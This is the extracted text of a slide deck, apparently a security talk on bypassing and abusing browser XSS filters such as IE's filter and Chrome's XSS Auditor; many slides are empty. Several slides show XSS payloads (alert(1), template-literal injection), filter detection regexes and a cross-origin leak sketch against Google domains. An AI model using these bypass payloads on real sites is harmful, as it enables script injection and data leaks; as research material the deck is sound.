Slide 1
Slide 1 text
No content
Slide 2
Slide 2 text
No content
Slide 3
Slide 3 text
❶
➌
❷
❹
Slide 4
Slide 4 text
No content
Slide 5
Slide 5 text
https://example.com/?q=">
">
Slide 6
Slide 6 text
https://example.com/?q=">
">
Slide 7
Slide 7 text
https://addons.mozilla.org/ja/firefox/addon/noscript/
Slide 8
Slide 8 text
HTTP/1.1 200 OK
Date: Tue, 28 Mar 2017 06:16:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Slide 9
Slide 9 text
No content
Slide 10
Slide 10 text
No content
Slide 11
Slide 11 text
No content
Slide 12
Slide 12 text
https://example.com/?q=">
https://example.com/#5382863726995448701
">
">
Slide 13
Slide 13 text
No content
Slide 14
Slide 14 text
">
https://example.com/?q=">
Slide 15
Slide 15 text
">
https://example.com/?q=">
Slide 16
Slide 16 text
https://example.com/?q=">
https://example.com/#5382863726995448701
Slide 17
Slide 17 text
<script> - Google 検索
(function(){window.google={kEI: [...]
https://www.google.co.jp/search?q=<script>
Slide 18
Slide 18 text
if(jQuery){
// Expected
}else{
// ???
}
https://example.com/?
Slide 19
Slide 19 text
No content
Slide 20
Slide 20 text
{}
{
Slide 21
Slide 21 text
[ /+\t\"\'`]{o}n\c\c\c+?[ +\t]*?=.
">
Slide 22
Slide 22 text
">
[\"\'][ ]*(([^a-z0-
9~_:\'\" ])|((i|(\\u0069))(n|(\\u006[Ee]))
)).+?{\(}.*?{\)}
x="";alert(1)//"
Slide 23
Slide 23 text
No content
Slide 24
Slide 24 text
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-
2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
http://d.hatena.ne.jp/teracc/20090622
Slide 25
Slide 25 text
https://www.slideshare.net/masatokinugawa/xxn-ja
Slide 26
Slide 26 text
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
.+?[.].+?=
q = "";document#body.innerHTML="<xss>";
URL: ?q=";document.body.innerHTML="
Slide 27
Slide 27 text
[\"\'][ ]*(([^a-z0-9~_:\'\" ])|(in))
.+?[.].+?=
<script src="//example.co.jp/test.js"
type="text/javascript">
URL: ?"/++.+++=
Slide 28
Slide 28 text
"style=:\
javascript:-
vbscript:-
vbs:-
",x[]=
"{toString:
"{valueOf:
Slide 29
Slide 29 text
Slide 30
Slide 30 text
window#name//Syntax Error
window^name//Syntax OK
window.name
Slide 31
Slide 31 text
No content
Slide 32
Slide 32 text
url=location.search.slice(1);
if(url^indexOf(":")!=-1){
url=null;
}
onload=function(){
if(url){location=url;}
}
Slide 33
Slide 33 text
https://example.com/?q=";alert`1`//
q = "";alert`1`//";
https://www.slideshare.net/x00mario/es6-en/34
ECMAScript 6 from an Attacker's Perspective
- Breaking Frameworks, Sandboxes, and everything else
Slide 34
Slide 34 text
https://example.com/?q=${alert(1)}``//&`+++`
https://example.com/?q=[USER_INPUT]
foo=``;
q="[USER_INPUT]";
foo=`#;
q="${alert(1)}#`//";
Slide 35
Slide 35 text
https://example.com/?+onfiles+++=.
[...]
Slide 36
Slide 36 text
https://bugs.chromium.org/p/chromium/issues/detail?id=654794
Slide 37
Slide 37 text
No content
Slide 38
Slide 38 text
http://blog.portswigger.net/2015/08/abusing-chromes-xss-auditor-to-steal.html
Slide 39
Slide 39 text
https://VICTIM/
https://VICTIM/?
IFRAME ERROR
https://ATTACKER/
win=window.open(…) if(win.length == 0){
//
//
}else{
//
}
…
Slide 40
Slide 40 text
Slide 41
Slide 41 text
https://www.youtube.com/watch?v=IMDWjKFbsJE
Slide 42
Slide 42 text
HTTP/1.1 200 OK
[...]
Server: gws
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Slide 43
Slide 43 text
https://accounts.google.com/ServiceLogin?
Slide 44
Slide 44 text
google.ae
google.as
google.ca
google.co
google.co.in
google.co.jp
google.co.kr
google.co.nz
google.co.uk
google.com.br
google.com.mx
google.de
google.es
google.fr
google.it
google.pl
google.pt
google.ru
...(
Slide 45
Slide 45 text
✨
✨
✨
Slide 46
Slide 46 text
{
Slide 47
Slide 47 text
0
1
2
3
4
5
6
7
8
9
10
https://example.com/
Slide 50
Slide 50 text
0x01-08 0x0E-1F
!"$%'()*;=^`|~
0x09-0D 0x20 +
&
>
#,/:?[\]{}
-.@_
A a
0x00
0-9 <
B-Z b-z
Slide 51
Slide 51 text
0x01-08 0x0E-1F
!"$%'()*;=^`|~
0x09-0D 0x20 +
&
>
#,/:?[\]{}
-.@_
A a
0x00
0-9 <
B-Z b-z
Slide 53
Slide 53 text
✔
✔
✔
✔
Slide 55
Slide 55 text
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
https://www.google.co.jp/?"[email protected]=
Slide 56
Slide 56 text
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.de/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
Slide 57
Slide 57 text
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ru/?"[email protected]=
https://www.google.ca/?"[email protected]=
...
Slide 58
Slide 58 text
✨
✨
✨
Slide 59
Slide 59 text
No content
Slide 60
Slide 60 text
No content
Slide 61
Slide 61 text
No content
Slide 62
Slide 62 text
No content
Slide 63
Slide 63 text
Slide 64
Slide 64 text
Slide 65
Slide 65 text
Slide 66
Slide 66 text
No content